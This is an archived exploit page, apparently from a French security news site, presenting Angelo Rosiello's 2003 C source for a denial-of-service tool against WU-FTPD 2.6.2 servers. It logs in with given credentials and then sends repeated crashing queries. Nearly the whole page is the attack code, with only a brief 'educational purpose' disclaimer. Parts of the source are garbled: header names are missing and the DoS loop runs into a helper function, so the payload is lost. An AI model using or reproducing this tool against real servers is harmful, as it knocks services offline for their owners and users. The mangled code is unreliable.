WU-FTPD 2.6.2 Remote Denial Of Service Exploit (wuftpd-freezer.c)

    
 
/*
                              *     (c) Rosiello Security
                              *
                              * Copyright Rosiello Security 2003
                              *   All Rights reserved.
                              *
                              * Tested on Red Hat 9.0
                              *
                              * Author: Angelo Rosiello
                              * Mail  : angelo rosiello org
                              * This software is only for educational purpose.
                              * Do not use it against machines different from yours.
                              * Respect law.
                              *
                              */

                              #include 
                              #include 
                              #include 
                              #include 
                              #include 

                              void addr_initialize( );
                              void usage( );

                              int main( int argc, char **argv )
                              {
                              int i, sd, PORT, loop, error;
                              char user[30], password[30], ch;
                              struct sockaddr_in server_addr;

                              fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
                              fprintf( stdout, "http://www.rosiello.org\n" );
                              fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

                              if( argc != 6 ) usage( argv[0] );

                              if( strlen( argv[3] ) > 20 ) exit( 0 );
                              if( strlen( argv[4] ) > 20 ) exit( 0 );

                              sprintf( user, "USER %s\n", argv[3] );
                              sprintf( password, "PASS %s\n", argv[4] );

                              PORT = atoi( argv[2] );
                              loop = atoi( argv[5] );

                              addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
                              sd = socket( AF_INET, SOCK_STREAM, 0 );

                              error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
                              if( error != 0 )
                              {
                              perror( "Something wrong with the connection" );
                              exit( 0 );
                              }

                              while ( ch != '\n' )
                              {
                              recv( sd, &ch, 1, 0);
                              printf("%c", ch );
                              }

                              ch = '\0';

                              printf( "Connection executed, now waiting to log in...\n" );

                              printf( "%s", user );

                              send( sd, user, strlen( user ), 0 );
                              while ( ch != '\n' )
                              {
                              recv( sd, &ch, 1, 0);
                              printf("%c", ch );
                              }
                              printf( "%s", password );

                              ch = '\0';

                              send( sd, password, strlen( password ), 0 );
                              while ( ch != '\n' )
                              {
                              recv( sd, &ch, 1, 0);
                              printf("%c", ch );
                              }

                              printf( "Sending the DoS query\n" );
                              for( i=0; i sin_family = AF_INET;
                              address -> sin_port = htons((u_short)port);
                              address -> sin_addr.s_addr = IPaddr;
                              }

                              void usage( char *program )
                              {
                              fprintf(stdout, "USAGE: <%s>     \n", program);
                              exit(0);
                              }
                              
                              

 Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits